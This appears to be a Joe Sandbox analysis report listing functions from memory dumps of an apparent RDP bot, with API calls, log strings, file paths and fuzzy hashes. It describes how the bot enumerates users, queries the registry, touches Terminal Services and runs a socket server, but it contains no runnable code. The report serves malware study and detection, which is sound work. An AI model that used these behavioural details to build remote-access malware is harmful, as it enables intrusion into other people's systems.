String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc$service
API String ID: 1423203057-455140666
Opcode ID: 35243e979596ad422c2f18207ff51bd9580465b6590dea18778290f8818280f5
Instruction ID: 09da325f7e34692e0f79f68bfbccb3647551e24f0097fd106239c02b46137224
Opcode Fuzzy Hash: 35243e979596ad422c2f18207ff51bd9580465b6590dea18778290f8818280f5
Instruction Fuzzy Hash: F4A1D4E2A0E68295EE10AB05FC00BB9A771AF44B95FC84035DA4F477A9DF7CE945C321

Function 00007FF70CAD9242 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32 ref: 00007FF70CAD929C
RegQueryValueExA.KERNEL32 ref: 00007FF70CAD93E4

Part of subcall function 00007FF70CAD2EF2: fwrite.MSVCRT ref: 00007FF70CAD2F9E
Part of subcall function 00007FF70CAD2EF2: fflush.MSVCRT ref: 00007FF70CAD2FAA

Strings

(value_sz != NULL), xrefs: 00007FF70CAD93A2
(value != NULL), xrefs: 00007FF70CAD936F
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF70CAD96DB
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FF70CAD9412
(key != NULL), xrefs: 00007FF70CAD933C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF70CAD9317, 00007FF70CAD934A, 00007FF70CAD937D, 00007FF70CAD93B0
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FF70CAD92BE
NULL, xrefs: 00007FF70CAD943E, 00007FF70CAD96EC, 00007FF70CAD96F8
(root != NULL), xrefs: 00007FF70CAD9309
registry_get_value, xrefs: 00007FF70CAD92B7, 00007FF70CAD9310, 00007FF70CAD9343, 00007FF70CAD9376, 00007FF70CAD93A9, 00007FF70CAD940B, 00007FF70CAD9556, 00007FF70CAD96D4
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF70CAD955D
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FF70CAD9302, 00007FF70CAD9335, 00007FF70CAD9368, 00007FF70CAD939B

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: (key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-910542497
Opcode ID: 6c1ab389037e3008b7792e2b6071de4ca39f8c1e13feda42e4c345670232ac5d
Instruction ID: d1ebc88919e6b34e2de3604bd2ec74aede702af96f83e004e638767c223b46bc
Opcode Fuzzy Hash: 6c1ab389037e3008b7792e2b6071de4ca39f8c1e13feda42e4c345670232ac5d
Instruction Fuzzy Hash: ADA110E091C70B91FA30B720BC44BBAA650AF04748FD40132DA1F076A9EF6DE949D362

Function 00007FFDA5BA3553 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 134memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFDA5BA363E
HeapAlloc.KERNEL32 ref: 00007FFDA5BA3652
CreateThread.KERNEL32 ref: 00007FFDA5BA3694
EnterCriticalSection.KERNEL32 ref: 00007FFDA5BA36AA
LeaveCriticalSection.KERNEL32 ref: 00007FFDA5BA36D1
GetLastError.KERNEL32 ref: 00007FFDA5BA3721
GetProcessHeap.KERNEL32 ref: 00007FFDA5BA3752
HeapFree.KERNEL32 ref: 00007FFDA5BA3763

Strings

mem_alloc, xrefs: 00007FFDA5BA36F9
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDA5BA3700
routine_accept, xrefs: 00007FFDA5BA357E, 00007FFDA5BA36DB, 00007FFDA5BA372E
[E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu), xrefs: 00007FFDA5BA3735
[I] (%s) -> Server ready(ssock=0x%llx), xrefs: 00007FFDA5BA3585
[I] (%s) -> Client accepted(client=0x%llx), xrefs: 00007FFDA5BA36E2

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: Heap$CriticalProcessSection$AllocCreateEnterErrorFreeLastLeaveThread
String ID: [E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Client accepted(client=0x%llx)$[I] (%s) -> Server ready(ssock=0x%llx)$mem_alloc$routine_accept
API String ID: 871770459-375624272
Opcode ID: 501e596d01d368ba44fe74e58d57c78eb87be7e410ca6c051b90cc79acd898b9
Instruction ID: d02e3ab01caff759d5d1863ae5b169edfe3d2c745db780062c6abbeeffbc7f2f
Opcode Fuzzy Hash: 501e596d01d368ba44fe74e58d57c78eb87be7e410ca6c051b90cc79acd898b9
Instruction Fuzzy Hash: 8F514F60B0AA0B83FA155B15A8303B96250AF47FA6F154B31DA2E077E3DE7EE5418349

Function 00007FFDA557715F Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFDA5576DD8
wcsncpy.MSVCRT ref: 00007FFDA5576E06
LookupAccountNameW.ADVAPI32 ref: 00007FFDA5576E63
GetLastError.KERNEL32 ref: 00007FFDA5576E75
wcslen.MSVCRT ref: 00007FFDA55771F7
GetProcessHeap.KERNEL32 ref: 00007FFDA5577207
HeapAlloc.KERNEL32 ref: 00007FFDA5577218
GetProcessHeap.KERNEL32 ref: 00007FFDA5577234
HeapAlloc.KERNEL32 ref: 00007FFDA5577245
NetApiBufferFree.NETAPI32 ref: 00007FFDA5577283
NetUserEnum.NETAPI32 ref: 00007FFDA55772F9
GetProcessHeap.KERNEL32 ref: 00007FFDA5577337
HeapAlloc.KERNEL32 ref: 00007FFDA5577348
memcpy.MSVCRT ref: 00007FFDA5577385
GetProcessHeap.KERNEL32 ref: 00007FFDA557738A
HeapFree.KERNEL32 ref: 00007FFDA557739B

Strings

D, xrefs: 00007FFDA5576DF5
users_sync, xrefs: 00007FFDA5576E80
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDA5577262
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFDA5576E87
mem_alloc, xrefs: 00007FFDA557725B

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: a4298e7b122fbae6062e031dd61c21640c8cf46f8bb4e553a12712b4540fc067
Instruction ID: 7916308a6a5222c713e3a7e12fb414fbf754c724cdc80604ac2bba68f7506a02
Opcode Fuzzy Hash: a4298e7b122fbae6062e031dd61c21640c8cf46f8bb4e553a12712b4540fc067
Instruction Fuzzy Hash: 9C515D7AB0AB4A86EB51CF55E46436977A1FB86F44F404435DA4D4736ADF3CE804C704

Function 00007FFDA5577174 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFDA5576DD8
wcsncpy.MSVCRT ref: 00007FFDA5576E06
LookupAccountNameW.ADVAPI32 ref: 00007FFDA5576E63
GetLastError.KERNEL32 ref: 00007FFDA5576E75
wcslen.MSVCRT ref: 00007FFDA55771F7
GetProcessHeap.KERNEL32 ref: 00007FFDA5577207
HeapAlloc.KERNEL32 ref: 00007FFDA5577218
GetProcessHeap.KERNEL32 ref: 00007FFDA5577234
HeapAlloc.KERNEL32 ref: 00007FFDA5577245
NetApiBufferFree.NETAPI32 ref: 00007FFDA5577283
NetUserEnum.NETAPI32 ref: 00007FFDA55772F9
GetProcessHeap.KERNEL32 ref: 00007FFDA5577337
HeapAlloc.KERNEL32 ref: 00007FFDA5577348
memcpy.MSVCRT ref: 00007FFDA5577385
GetProcessHeap.KERNEL32 ref: 00007FFDA557738A
HeapFree.KERNEL32 ref: 00007FFDA557739B

Strings

D, xrefs: 00007FFDA5576DF5
users_sync, xrefs: 00007FFDA5576E80
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDA5577262
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFDA5576E87
mem_alloc, xrefs: 00007FFDA557725B

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: 6c0a4d4fc4eafb2a18a36948cfbb7946067a6be85329e86a1acf2c5e9ae14cf3
Instruction ID: c2a614e035cf3b85a6bab8ff1fbae6847517e6f60a22366e8b1656e7a7354c09
Opcode Fuzzy Hash: 6c0a4d4fc4eafb2a18a36948cfbb7946067a6be85329e86a1acf2c5e9ae14cf3
Instruction Fuzzy Hash: 3B516D7AB0AB4A86EB51CF15E46436977A1FB86F44F404435DA4D4336ADF3CE808C704

Function 00007FFDA5577151 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFDA5576DD8
wcsncpy.MSVCRT ref: 00007FFDA5576E06
LookupAccountNameW.ADVAPI32 ref: 00007FFDA5576E63
GetLastError.KERNEL32 ref: 00007FFDA5576E75
wcslen.MSVCRT ref: 00007FFDA55771F7
GetProcessHeap.KERNEL32 ref: 00007FFDA5577207
HeapAlloc.KERNEL32 ref: 00007FFDA5577218
GetProcessHeap.KERNEL32 ref: 00007FFDA5577234
HeapAlloc.KERNEL32 ref: 00007FFDA5577245
NetApiBufferFree.NETAPI32 ref: 00007FFDA5577283
NetUserEnum.NETAPI32 ref: 00007FFDA55772F9
GetProcessHeap.KERNEL32 ref: 00007FFDA5577337
HeapAlloc.KERNEL32 ref: 00007FFDA5577348
memcpy.MSVCRT ref: 00007FFDA5577385
GetProcessHeap.KERNEL32 ref: 00007FFDA557738A
HeapFree.KERNEL32 ref: 00007FFDA557739B

Strings

D, xrefs: 00007FFDA5576DF5
users_sync, xrefs: 00007FFDA5576E80
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDA5577262
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFDA5576E87
mem_alloc, xrefs: 00007FFDA557725B

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: 34ca061acf4e3cd6d3fc7e618a7595f8d024dafa0802be9c57e0352fc75bf84d
Instruction ID: 08328ff8c49c34f9dab6221290187c58f50fa6fa297dcdbb310cf5242d44dbfb
Opcode Fuzzy Hash: 34ca061acf4e3cd6d3fc7e618a7595f8d024dafa0802be9c57e0352fc75bf84d
Instruction Fuzzy Hash: 81516D7AB0AB4A86EB52CF15E46436977A1FB86F44F404435DA4D4336ADF3CE804C704

Function 00007FFDA5577158 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFDA5576DD8
wcsncpy.MSVCRT ref: 00007FFDA5576E06
LookupAccountNameW.ADVAPI32 ref: 00007FFDA5576E63
GetLastError.KERNEL32 ref: 00007FFDA5576E75
wcslen.MSVCRT ref: 00007FFDA55771F7
GetProcessHeap.KERNEL32 ref: 00007FFDA5577207
HeapAlloc.KERNEL32 ref: 00007FFDA5577218
GetProcessHeap.KERNEL32 ref: 00007FFDA5577234
HeapAlloc.KERNEL32 ref: 00007FFDA5577245
NetApiBufferFree.NETAPI32 ref: 00007FFDA5577283
NetUserEnum.NETAPI32 ref: 00007FFDA55772F9
GetProcessHeap.KERNEL32 ref: 00007FFDA5577337
HeapAlloc.KERNEL32 ref: 00007FFDA5577348
memcpy.MSVCRT ref: 00007FFDA5577385
GetProcessHeap.KERNEL32 ref: 00007FFDA557738A
HeapFree.KERNEL32 ref: 00007FFDA557739B

Strings

D, xrefs: 00007FFDA5576DF5
users_sync, xrefs: 00007FFDA5576E80
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDA5577262
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFDA5576E87
mem_alloc, xrefs: 00007FFDA557725B

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: 406d0f4e3bc12a49c341ef7075332833a598e0fcba5e5b8daee238f18105a43b
Instruction ID: 87566361c1a9546bed1f7800615b5717e43d2727d321e1c9b5c62d9e8d57d2a9
Opcode Fuzzy Hash: 406d0f4e3bc12a49c341ef7075332833a598e0fcba5e5b8daee238f18105a43b
Instruction Fuzzy Hash: 3D516D7AB0AB4A86EB51CF15E46436977A1FB86F44F404435DA4D4336AEF3CE804C704

Function 00007FFDA55A8B63 Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 94COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFDA55A8B74
OpenSCManagerA.ADVAPI32 ref: 00007FFDA55A8B9E
GetLastError.KERNEL32 ref: 00007FFDA55A8BE6
GetLastError.KERNEL32 ref: 00007FFDA55A8CBE

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA55A8BD2
[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu), xrefs: 00007FFDA55A8CCE
ServicesActive, xrefs: 00007FFDA55A8B92
, xrefs: 00007FFDA55A8C04
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu), xrefs: 00007FFDA55A8BF8
Done, xrefs: 00007FFDA55A8CEE
scm_init, xrefs: 00007FFDA55A8BCB, 00007FFDA55A8BF1, 00007FFDA55A8CC7, 00007FFDA55A8CF5
~, xrefs: 00007FFDA55A8C64
P, xrefs: 00007FFDA55A8C6D
[I] (%s) -> %s, xrefs: 00007FFDA55A8CFC

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: ErrorLast$CountCriticalInitializeManagerOpenSectionSpinfflushfwrite
String ID: $Done$P$ServicesActive$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu)$[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu)$[I] (%s) -> %s$scm_init$~
API String ID: 546114577-3142219161
Opcode ID: fb4caca265b0be7313e155c760840d1fa3bc9f678d2bb8049f5f8fcea4102657
Instruction ID: d96f2f8dce5c53f6a767c3ab02f17c74875f045216b5a3a17187c8550651902b
Opcode Fuzzy Hash: fb4caca265b0be7313e155c760840d1fa3bc9f678d2bb8049f5f8fcea4102657
Instruction Fuzzy Hash: 3C41F1B8F0E60FA1FB2A5F50A4F93781260AF17F40F510836C64E463E3AE5EA945870D

Function 00007FFDA5BA3340 Relevance: 24.1, APIs: 10, Strings: 6, Instructions: 101memorysleepCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFDA5BA340C
HeapFree.KERNEL32 ref: 00007FFDA5BA341D
EnterCriticalSection.KERNEL32 ref: 00007FFDA5BA3441
LeaveCriticalSection.KERNEL32 ref: 00007FFDA5BA3464
EnterCriticalSection.KERNEL32 ref: 00007FFDA5BA34D1
Sleep.KERNEL32 ref: 00007FFDA5BA34F0
EnterCriticalSection.KERNEL32 ref: 00007FFDA5BA3502
GetProcessHeap.KERNEL32 ref: 00007FFDA5BA3520
HeapFree.KERNEL32 ref: 00007FFDA5BA3531
LeaveCriticalSection.KERNEL32 ref: 00007FFDA5BA3540

Strings

[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFDA5BA34BE
-VRSTVE-, xrefs: 00007FFDA5BA3365
routine_tx, xrefs: 00007FFDA5BA34B7
KCIT, xrefs: 00007FFDA5BA335D
--TSCB--, xrefs: 00007FFDA5BA3374
, xrefs: 00007FFDA5BA3355

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: CriticalSection$Heap$Enter$FreeLeaveProcess$Sleep
String ID: $--TSCB--$-VRSTVE-$KCIT$[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
API String ID: 610085118-1825955162
Opcode ID: 16ec5899d4c37e0d2410b5bfc2ab00d0514c7870d851ef3f2ba0803ab40a7034
Instruction ID: 9fb662ee387d66a42fdea9aad914ae2b4aecb1096da9f08d482d0c8bd98d0571
Opcode Fuzzy Hash: 16ec5899d4c37e0d2410b5bfc2ab00d0514c7870d851ef3f2ba0803ab40a7034
Instruction Fuzzy Hash: 46513B31B0BA4AD2EA158B15F86037A6360FF4AF92F110435EA4E437A6DF7DE541C308

Function 00007FF70CAD7166 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32 ref: 00007FF70CAD719A

Part of subcall function 00007FF70CAD2EF2: fwrite.MSVCRT ref: 00007FF70CAD2F9E
Part of subcall function 00007FF70CAD2EF2: fflush.MSVCRT ref: 00007FF70CAD2FAA

GetLastError.KERNEL32 ref: 00007FF70CAD72F9

Strings

(xpath != NULL), xrefs: 00007FF70CAD722D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF70CAD7208, 00007FF70CAD723B, 00007FF70CAD726B, 00007FF70CAD729B
[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x), xrefs: 00007FF70CAD72CD
[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu), xrefs: 00007FF70CAD730E
((*xpath_sz) > 0), xrefs: 00007FF70CAD728D
[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu), xrefs: 00007FF70CAD73DB
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF70CAD71F3, 00007FF70CAD7226, 00007FF70CAD7256, 00007FF70CAD7286
(xpath_sz != NULL), xrefs: 00007FF70CAD725D
fs_path_expand, xrefs: 00007FF70CAD71CE, 00007FF70CAD7201, 00007FF70CAD7234, 00007FF70CAD7264, 00007FF70CAD7294, 00007FF70CAD72C6, 00007FF70CAD7307, 00007FF70CAD73D4
[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu), xrefs: 00007FF70CAD71D5
(path != NULL), xrefs: 00007FF70CAD71FA

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: EnvironmentErrorExpandLastStringsfflushfwrite
String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
API String ID: 1721699506-2819899730
Opcode ID: 10e75d5b59e40a2193b1b9d0a34103648fe9de92aec31d16d2012405010df0ab
Instruction ID: 044719ae2caaaeb608be579f7f2a844c0508da59e7a073de224c8202eaaa8708
Opcode Fuzzy Hash: 10e75d5b59e40a2193b1b9d0a34103648fe9de92aec31d16d2012405010df0ab
Instruction Fuzzy Hash: 8A614FE1E0C59785FA24BB54FC40BB8A255AF80398FD54132E90F8759DDF3CEA868361

Function 00007FFDA55A6F2B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 132stringtimeCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFDA55A6F93
strlen.MSVCRT ref: 00007FFDA55A6FB5
strlen.MSVCRT ref: 00007FFDA55A6FC9
strlen.MSVCRT ref: 00007FFDA55A703F
strlen.MSVCRT ref: 00007FFDA55A705B
strlen.MSVCRT ref: 00007FFDA55A706C
CompareFileTime.KERNEL32 ref: 00007FFDA55A70BE

Part of subcall function 00007FFDA55A8B2C: EnterCriticalSection.KERNEL32 ref: 00007FFDA55A8B37

Strings

v32.ini, xrefs: 00007FFDA55A6FDE
TermService, xrefs: 00007FFDA55A711D
termsrv3, xrefs: 00007FFDA55A6FD1
%ProgramFiles%\RDP\, xrefs: 00007FFDA55A7021
v32.ini, xrefs: 00007FFDA55A7081
termsrv3, xrefs: 00007FFDA55A7074

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: strlen$CompareCriticalEnterFileSectionTime
